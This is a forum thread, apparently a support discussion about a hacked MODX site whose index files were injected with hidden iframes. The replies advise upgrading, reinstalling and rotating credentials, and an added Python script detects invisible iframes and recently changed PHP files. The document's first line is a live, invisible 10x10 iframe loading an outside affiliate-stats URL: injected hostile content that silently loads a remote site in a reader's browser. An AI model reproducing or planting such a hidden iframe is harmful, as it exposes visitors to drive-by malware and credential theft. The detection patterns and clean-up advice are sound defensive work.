<iframe src="http://affiliatesstats.com/in.cgi?4" width="10" height="10" style="visibility:hidden;position:absolute;left:0; top:0;"></iframe>
I would upgrade. Actually delete the entire manager directory and replace it with the new one. Make sure any file that shows the recent modification date is removed and replaced. Make sure your core/config/config.inc.php file is clean, as well as the three config.core.php files (root, manager and connectors).
If this is on shared or otherwise managed hosting, talk to your tech support. They possibly got into your site with the Manager user's password restore bug, which was fixed a few versions ago. Sign up for the security feed or newsletter and keep your sites updated. Or possibly the entire server was compromised, in which case you won't be the only one hosted on that server with problems.
Usually putting iframes into index.whatever files will cause the page to have the iframe when viewed. These are usually linked to malicious sites, or spam-links sites. The oddity of infecting the manager and connector index.php files could be explained by this being some kind of automated script, just looking for index.whatever files. That is why I'd be suspicious of some script actually having been uploaded to the server, in which case it'll just do it again.
As Sottwell suggests, an upgrade would be number 1. There have been quite some new releases since then, also regarding security issues.
Regarding your question
"So, anyway, what do you think the hackers are expecting to get out of this?"
It's quite simple, the iframe somehow contains malicious software that will attack the browser of the visitor. Or maybe a keylogger which will get all the keystrokes you, or your users, make while logging in.
The way you describe the problem looks like a scanner injecting all index.php files. That points to a complete compromise of your account, or maybe even the complete server (if shared).
It might be me, but I wouldn't trust anything anymore. If the site is of reasonable size I would opt for a complete reinstall.
Just create a new install on, for instance, a test domain, and recreate the site with only the newest release & packages.
Then copy content, images, javascript & css to new site. If all's running well again replace the "old" site with the updated one completely.
Also change ALL passes granted to users, moderators, ftp, sql, accountpanel etc...
That way you have a clean install again.
Just my 2 cents...
Good luck!
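
An added example, not part of any post in this thread: a small triage script for the two checks suggested above, finding files that carry an invisible iframe and PHP files with a recent modification date. The 14-day window, the 0-10 pixel size rule and the placeholder host in the constructed sample are assumptions.

```python
import os
import re
import sys
import time

IFRAME_RE = re.compile(rb"<iframe\b[^>]*>", re.IGNORECASE)
# Markers of a frame the visitor cannot see: hidden via CSS, or sized 0-10 px.
HIDDEN_RE = re.compile(
    rb"visibility\s*:\s*hidden|display\s*:\s*none"
    rb"|\b(?:width|height)\s*=\s*[\"']?(?:10|\d)[\"']?(?![\d%])",
    re.IGNORECASE,
)
# Constructed sample: a PHP index file with a hidden frame appended (placeholder host).
SAMPLE = (b"<?php require 'config.core.php'; ?>\n"
          b'<iframe src="http://injected.example.invalid/in.cgi" width="10" height="10" '
          b'style="visibility:hidden;position:absolute;left:0; top:0;"></iframe>\n')


def hidden_iframes(data):
    """Return every <iframe> opening tag in data that is styled to be invisible."""
    return [m.group(0).decode("latin-1") for m in IFRAME_RE.finditer(data)
            if HIDDEN_RE.search(m.group(0))]


def scan(root, days=14, now=None):
    """Walk root and return sorted (relative path, reason, detail) findings."""
    now = time.time() if now is None else now
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                mtime = os.stat(path).st_mtime
                with open(path, "rb") as fh:
                    data = fh.read(2_000_000)  # index and config files are small
            except OSError:
                continue  # unreadable file: skip it, keep scanning
            rel = os.path.relpath(path, root)
            findings += [(rel, "hidden-iframe", tag) for tag in hidden_iframes(data)]
            if name.lower().endswith(".php") and now - mtime < days * 86400:
                stamp = time.strftime("%Y-%m-%d", time.localtime(mtime))
                findings.append((rel, "recently-modified", stamp))
    return sorted(findings)


if __name__ == "__main__":
    for rel, reason, detail in scan(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{reason}\t{rel}\t{detail}")
```

Run it against a copy of the web root; a clean result does not rule out an uploaded script elsewhere on the account, so it narrows the search rather than replacing the reinstall.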